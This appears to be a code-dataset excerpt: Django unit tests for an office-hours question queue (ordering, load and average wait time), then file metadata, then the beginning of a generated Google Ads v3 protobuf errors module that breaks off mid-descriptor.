response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(2, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.generate_header(self.student_user)
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
self.assertEquals("my question 2", self.queue.questions.values()[0]["description"])
class LoadHandlingTests(TestCase):
@freeze_time("2018-12-31 21:00:01", tick=True)
def setUp(self):
self.client = APIClient()
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
for i in range(50):
self.new_student_ask_question()
def gen_random_string(self, l):
return ''.join(random.choice(string.ascii_lowercase) for x in range(l))
def generate_header(self, user):
token, _ = Token.objects.get_or_create(user=user)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
def new_student_ask_question(self):
username = self.gen_random_string(8)
first_name = self.gen_random_string(8)
last_name = self.gen_random_string(8)
password = self.gen_random_string(10)
student_user = StudentUser.objects.create(
username=username,
email= username + "@upenn.edu",
first_name=first_name,
last_name=last_name,
password=password
)
student_user.set_password(password)
student_user.is_active = True
student_user.save()
self.generate_header(student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
@freeze_time("2018-12-31 21:00:01", tick=True)
def test_queue_can_handle_lot_of_questions(self):
self.assertEquals(50, len(self.queue.questions.values()))
@freeze_time("2018-12-31 21:00:01", tick=True)
def test_queue_maintains_order(self):
prev_question = None
for question in self.queue.questions.values():
if prev_question != None:
self.assertTrue(question["ask_date"] > prev_question["ask_date"])
prev_question = question
class AverageWaitTimeTesting(TestCase):
def setUp(self):
self.client = APIClient()
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
self.ta_user = StudentUser.objects.create(username="ta", email="ta@upenn.edu", first_name="ta",
last_name="smith", password="testing123")
self.ta_user.set_password("testing123")
self.ta_user.is_active = True
self.ta_user.is_ta = True
self.ta_user.save()
self.freezer = freeze_time("2018-12-31 21:00:01")
self.freezer.start()
def gen_random_string(self, l):
return ''.join(random.choice(string.ascii_lowercase) for x in range(l))
def generate_header(self, user):
token, _ = Token.objects.get_or_create(user=user)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
def new_student_ask_question(self):
username = self.gen_random_string(8)
first_name = self.gen_random_string(8)
last_name = self.gen_random_string(8)
password = self.gen_random_string(10)
student_user = StudentUser.objects.create(
username=username,
email= username + "@upenn.edu",
first_name=first_name,
last_name=last_name,
password=password
)
student_user.set_password(password)
student_user.is_active = True
student_user.save()
self.generate_header(student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
def answer_top_question(self):
question_id_one = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_one}, format="json")
def test_wait_time_is_init_zero(self):
self.assertEquals(0, self.queue.average_wait_time)
def test_one_question_wait_time_is_zero(self):
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(0, self.queue.average_wait_time)
def test_two_question_wait_time_is_one(self):
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(.5, self.queue.average_wait_time)
def test_three_question_wait_time_is_one(self):
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:04:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(1, self.queue.average_wait_time)
def test_four_question_wait_time_is_one(self):
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:04:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:14:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(3.2, self.queue.average_wait_time)
def test_after_one_hour_average_reset(self):
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(.5, self.queue.average_wait_time)
self.new_student_ask_question()
self.freezer = freeze_time("2018-12-31 22:04:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(0, self.queue.average_wait_time)
| 44.22292
| 134
| 0.666986
| 3,608
| 28,170
| 5.025776
| 0.056541
| 0.03921
| 0.055589
| 0.064303
| 0.91452
| 0.902112
| 0.896928
| 0.890366
| 0.873932
| 0.864281
| 0
| 0.028291
| 0.185659
| 28,170
| 636
| 135
| 44.292453
| 0.762162
| 0.006816
| 0
| 0.787942
| 0
| 0
| 0.15035
| 0.042334
| 0
| 0
| 0
| 0
| 0.218295
| 1
| 0.12474
| false
| 0.033264
| 0.018711
| 0.004158
| 0.155925
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98ef59cbc1344f9834b9ab69a326309e855d4512
| 171,040
|
py
|
Python
|
google/ads/google_ads/v3/proto/errors/errors_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | 1
|
2019-11-30T23:42:39.000Z
|
2019-11-30T23:42:39.000Z
|
google/ads/google_ads/v3/proto/errors/errors_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | null | null | null |
google/ads/google_ads/v3/proto/errors/errors_pb2.py
|
jphanwebstaurant/google-ads-python
|
600812b2afcc4d57f00b47dfe436620ce50bfe9b
|
[
"Apache-2.0"
] | 1
|
2020-09-30T17:04:06.000Z
|
2020-09-30T17:04:06.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v3/proto/errors/errors.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v3.proto.common import policy_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2
from google.ads.google_ads.v3.proto.common import value_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_value__pb2
from google.ads.google_ads.v3.proto.errors import access_invitation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_access__invitation__error__pb2
from google.ads.google_ads.v3.proto.errors import account_budget_proposal_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_account__budget__proposal__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_customizer_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__customizer__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_ad_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__ad__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_bid_modifier_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__bid__modifier__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__feed__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_parameter_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__parameter__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_sharing_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__sharing__error__pb2
from google.ads.google_ads.v3.proto.errors import adx_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_adx__error__pb2
from google.ads.google_ads.v3.proto.errors import asset_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__error__pb2
from google.ads.google_ads.v3.proto.errors import asset_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__link__error__pb2
from google.ads.google_ads.v3.proto.errors import authentication_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authentication__error__pb2
from google.ads.google_ads.v3.proto.errors import authorization_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authorization__error__pb2
from google.ads.google_ads.v3.proto.errors import bidding_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__error__pb2
from google.ads.google_ads.v3.proto.errors import bidding_strategy_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__strategy__error__pb2
from google.ads.google_ads.v3.proto.errors import billing_setup_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_billing__setup__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_budget_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__budget__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_draft_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__draft__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_experiment_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__experiment__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__feed__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_shared_set_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__shared__set__error__pb2
from google.ads.google_ads.v3.proto.errors import change_status_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_change__status__error__pb2
from google.ads.google_ads.v3.proto.errors import collection_size_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_collection__size__error__pb2
from google.ads.google_ads.v3.proto.errors import context_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_context__error__pb2
from google.ads.google_ads.v3.proto.errors import conversion_action_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__action__error__pb2
from google.ads.google_ads.v3.proto.errors import conversion_adjustment_upload_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__adjustment__upload__error__pb2
from google.ads.google_ads.v3.proto.errors import conversion_upload_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__upload__error__pb2
from google.ads.google_ads.v3.proto.errors import country_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_country__code__error__pb2
from google.ads.google_ads.v3.proto.errors import criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import currency_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_currency__code__error__pb2
from google.ads.google_ads.v3.proto.errors import custom_interest_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_custom__interest__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_client_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__client__link__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__feed__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_manager_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__manager__link__error__pb2
from google.ads.google_ads.v3.proto.errors import database_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_database__error__pb2
from google.ads.google_ads.v3.proto.errors import date_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__error__pb2
from google.ads.google_ads.v3.proto.errors import date_range_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__range__error__pb2
from google.ads.google_ads.v3.proto.errors import distinct_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_distinct__error__pb2
from google.ads.google_ads.v3.proto.errors import enum_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_enum__error__pb2
from google.ads.google_ads.v3.proto.errors import extension_feed_item_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__feed__item__error__pb2
from google.ads.google_ads.v3.proto.errors import extension_setting_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__setting__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_attribute_reference_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__attribute__reference__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_item_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_item_target_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__target__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_item_validation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__validation__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_mapping_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__mapping__error__pb2
from google.ads.google_ads.v3.proto.errors import field_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__error__pb2
from google.ads.google_ads.v3.proto.errors import field_mask_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__mask__error__pb2
from google.ads.google_ads.v3.proto.errors import function_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__error__pb2
from google.ads.google_ads.v3.proto.errors import function_parsing_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__parsing__error__pb2
from google.ads.google_ads.v3.proto.errors import geo_target_constant_suggestion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_geo__target__constant__suggestion__error__pb2
from google.ads.google_ads.v3.proto.errors import header_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_header__error__pb2
from google.ads.google_ads.v3.proto.errors import id_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_id__error__pb2
from google.ads.google_ads.v3.proto.errors import image_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_image__error__pb2
from google.ads.google_ads.v3.proto.errors import internal_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_internal__error__pb2
from google.ads.google_ads.v3.proto.errors import invoice_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_invoice__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_ad_group_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__ad__group__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_campaign_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__campaign__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_idea_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__idea__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_keyword_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__keyword__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_negative_keyword_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__negative__keyword__error__pb2
from google.ads.google_ads.v3.proto.errors import label_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_label__error__pb2
from google.ads.google_ads.v3.proto.errors import language_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_language__code__error__pb2
from google.ads.google_ads.v3.proto.errors import list_operation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_list__operation__error__pb2
from google.ads.google_ads.v3.proto.errors import manager_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_manager__link__error__pb2
from google.ads.google_ads.v3.proto.errors import media_bundle_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__bundle__error__pb2
from google.ads.google_ads.v3.proto.errors import media_file_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__file__error__pb2
from google.ads.google_ads.v3.proto.errors import media_upload_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__upload__error__pb2
from google.ads.google_ads.v3.proto.errors import multiplier_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_multiplier__error__pb2
from google.ads.google_ads.v3.proto.errors import mutate_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__error__pb2
from google.ads.google_ads.v3.proto.errors import mutate_job_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__job__error__pb2
from google.ads.google_ads.v3.proto.errors import new_resource_creation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_new__resource__creation__error__pb2
from google.ads.google_ads.v3.proto.errors import not_empty_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__empty__error__pb2
from google.ads.google_ads.v3.proto.errors import not_whitelisted_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__whitelisted__error__pb2
from google.ads.google_ads.v3.proto.errors import null_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_null__error__pb2
from google.ads.google_ads.v3.proto.errors import offline_user_data_job_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_offline__user__data__job__error__pb2
from google.ads.google_ads.v3.proto.errors import operation_access_denied_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operation__access__denied__error__pb2
from google.ads.google_ads.v3.proto.errors import operator_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operator__error__pb2
from google.ads.google_ads.v3.proto.errors import partial_failure_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_partial__failure__error__pb2
from google.ads.google_ads.v3.proto.errors import payments_account_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_payments__account__error__pb2
from google.ads.google_ads.v3.proto.errors import policy_finding_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__finding__error__pb2
from google.ads.google_ads.v3.proto.errors import policy_validation_parameter_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__validation__parameter__error__pb2
from google.ads.google_ads.v3.proto.errors import policy_violation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__violation__error__pb2
from google.ads.google_ads.v3.proto.errors import query_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_query__error__pb2
from google.ads.google_ads.v3.proto.errors import quota_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_quota__error__pb2
from google.ads.google_ads.v3.proto.errors import range_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_range__error__pb2
from google.ads.google_ads.v3.proto.errors import reach_plan_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_reach__plan__error__pb2
from google.ads.google_ads.v3.proto.errors import recommendation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_recommendation__error__pb2
from google.ads.google_ads.v3.proto.errors import region_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_region__code__error__pb2
from google.ads.google_ads.v3.proto.errors import request_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_request__error__pb2
from google.ads.google_ads.v3.proto.errors import resource_access_denied_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__access__denied__error__pb2
from google.ads.google_ads.v3.proto.errors import resource_count_limit_exceeded_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__count__limit__exceeded__error__pb2
from google.ads.google_ads.v3.proto.errors import setting_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_setting__error__pb2
from google.ads.google_ads.v3.proto.errors import shared_criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import shared_set_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__set__error__pb2
from google.ads.google_ads.v3.proto.errors import size_limit_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_size__limit__error__pb2
from google.ads.google_ads.v3.proto.errors import string_format_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__format__error__pb2
from google.ads.google_ads.v3.proto.errors import string_length_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__length__error__pb2
from google.ads.google_ads.v3.proto.errors import time_zone_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_time__zone__error__pb2
from google.ads.google_ads.v3.proto.errors import url_field_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_url__field__error__pb2
from google.ads.google_ads.v3.proto.errors import user_data_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__data__error__pb2
from google.ads.google_ads.v3.proto.errors import user_list_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__list__error__pb2
from google.ads.google_ads.v3.proto.errors import youtube_video_registration_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_youtube__video__registration__error__pb2
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v3/proto/errors/errors.proto',
package='google.ads.googleads.v3.errors',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v3.errorsB\013ErrorsProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V3.Errors\312\002\036Google\\Ads\\GoogleAds\\V3\\Errors\352\002\"Google::Ads::GoogleAds::V3::Errors'),
serialized_pb=_b('\n1google/ads/googleads_v3/proto/errors/errors.proto\x12\x1egoogle.ads.googleads.v3.errors\x1a\x31google/ads/googleads_v3/proto/common/policy.proto\x1a\x30google/ads/googleads_v3/proto/common/value.proto\x1a\x42google/ads/googleads_v3/proto/errors/access_invitation_error.proto\x1aHgoogle/ads/googleads_v3/proto/errors/account_budget_proposal_error.proto\x1a>google/ads/googleads_v3/proto/errors/ad_customizer_error.proto\x1a\x33google/ads/googleads_v3/proto/errors/ad_error.proto\x1a<google/ads/googleads_v3/proto/errors/ad_group_ad_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/ad_group_bid_modifier_error.proto\x1a\x43google/ads/googleads_v3/proto/errors/ad_group_criterion_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/ad_group_error.proto\x1a>google/ads/googleads_v3/proto/errors/ad_group_feed_error.proto\x1a=google/ads/googleads_v3/proto/errors/ad_parameter_error.proto\x1a;google/ads/googleads_v3/proto/errors/ad_sharing_error.proto\x1a\x34google/ads/googleads_v3/proto/errors/adx_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/asset_error.proto\x1a;google/ads/googleads_v3/proto/errors/asset_link_error.proto\x1a?google/ads/googleads_v3/proto/errors/authentication_error.proto\x1a>google/ads/googleads_v3/proto/errors/authorization_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/bidding_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/bidding_strategy_error.proto\x1a>google/ads/googleads_v3/proto/errors/billing_setup_error.proto\x1a@google/ads/googleads_v3/proto/errors/campaign_budget_error.proto\x1a\x43google/ads/googleads_v3/proto/errors/campaign_criterion_error.proto\x1a?google/ads/googleads_v3/proto/errors/campaign_draft_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/campaign_error.proto\x1a\x44google/ads/googleads_v3/proto/errors/campaign_experiment_error.proto\x1a>google/ads/googleads_v3/proto/errors/campaign_feed_error.proto\x1a\x44google/ads/googleads_v3/proto/errors/campaign_shared_set_error.proto\x1a>google/ads/googleads_v3/proto/errors/change_status_error.proto\x1a@google/ads/googleads_v3/proto/errors/collection_size_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/context_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/conversion_action_error.proto\x1aMgoogle/ads/googleads_v3/proto/errors/conversion_adjustment_upload_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/conversion_upload_error.proto\x1a=google/ads/googleads_v3/proto/errors/country_code_error.proto\x1a:google/ads/googleads_v3/proto/errors/criterion_error.proto\x1a>google/ads/googleads_v3/proto/errors/currency_code_error.proto\x1a@google/ads/googleads_v3/proto/errors/custom_interest_error.proto\x1a\x45google/ads/googleads_v3/proto/errors/customer_client_link_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/customer_error.proto\x1a>google/ads/googleads_v3/proto/errors/customer_feed_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/customer_manager_link_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/database_error.proto\x1a\x35google/ads/googleads_v3/proto/errors/date_error.proto\x1a;google/ads/googleads_v3/proto/errors/date_range_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/distinct_error.proto\x1a\x35google/ads/googleads_v3/proto/errors/enum_error.proto\x1a\x44google/ads/googleads_v3/proto/errors/extension_feed_item_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/extension_setting_error.proto\x1aIgoogle/ads/googleads_v3/proto/errors/feed_attribute_reference_error.proto\x1a\x35google/ads/googleads_v3/proto/errors/feed_error.proto\x1a:google/ads/googleads_v3/proto/errors/feed_item_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/feed_item_target_error.proto\x1a\x45google/ads/googleads_v3/proto/errors/feed_item_validation_error.proto\x1a=google/ads/googleads_v3/proto/errors/feed_mapping_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/field_error.proto\x1a;google/ads/googleads_v3/proto/errors/field_mask_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/function_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/function_parsing_error.proto\x1aOgoogle/ads/googleads_v3/proto/errors/geo_target_constant_suggestion_error.proto\x1a\x37google/ads/googleads_v3/proto/errors/header_error.proto\x1a\x33google/ads/googleads_v3/proto/errors/id_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/image_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/internal_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/invoice_error.proto\x1a\x46google/ad